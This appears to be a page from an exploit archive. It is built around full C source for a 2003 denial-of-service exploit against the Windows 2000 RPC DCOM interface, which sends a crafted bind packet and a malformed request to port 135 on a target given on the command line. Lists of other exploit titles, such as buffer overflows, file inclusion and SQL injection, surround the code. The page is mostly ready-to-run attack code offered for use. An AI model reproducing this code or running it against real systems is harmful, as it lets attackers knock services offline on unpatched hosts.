exploits , vulnerabilities , articles , Microsoft Windows 2000 RPC DCOM Interface Denial of Service Exploit

2007-06-13 Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-08 Microsoft Windows Animated Cursor Stack Overflow Exploit
2007-04-17 MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2
2007-04-16 MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445)
2007-04-16 MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit
2007-04-15 XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit

2003-07-21

Microsoft Windows 2000 RPC DCOM Interface Denial of Service Exploit

// This is a new unpatched vulnerability - NOT the MS03-026

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



void main(int argc,char ** argv)
{
 WSADATA WSAData;
 int i;
 SOCKET sock;
 SOCKADDR_IN addr_in;
 
 short port=135;
 unsigned char buf1[0x1000];
 printf("RPC DCOM DOS Vulnerability discoveried by
Xfocus.org\n");
 printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry
xfocus org\n"); 
 printf("Welcome to http://www.xfocus.net\n");
 if(argc<2)
 {
 printf("useage:%s target\n",argv[0]);
exit(1);
 }


 if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
 {
 printf("WSAStartup error.Error:%d\n",WSAGetLastError());
 return;
 }

 addr_in.sin_family=AF_INET;
 addr_in.sin_port=htons(port);
 addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
 
 if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
 {
 printf("Socket failed.Error:%d\n",WSAGetLastError());
 return;
 }
 if(WSAConnect(sock,(struct sockaddr
*)&addr_in,sizeof(addr_in),NULL,NULL,NULL,
NULL)==SOCKET_ERROR)
 {
 printf("Connect failed.Error:%d",WSAGetLastError());
 return;
 }
 if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
 {
 printf("Send failed.Error:%d\n",WSAGetLastError());
 return;
 }

 i=recv(sock,buf1,1024,MSG_PEEK);
 if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
 {
 printf("Send failed.Error:%d\n",WSAGetLastError());
 return;
 }
 i=recv(sock,buf1,1024,MSG_PEEK);
}


securitydot.net - 2003-07-21

Exploits - newest 10 RSS | More

2007-06-15 56992 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34033 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42171 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29202 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19629 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16600 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19284 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16462 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33451 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17125 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit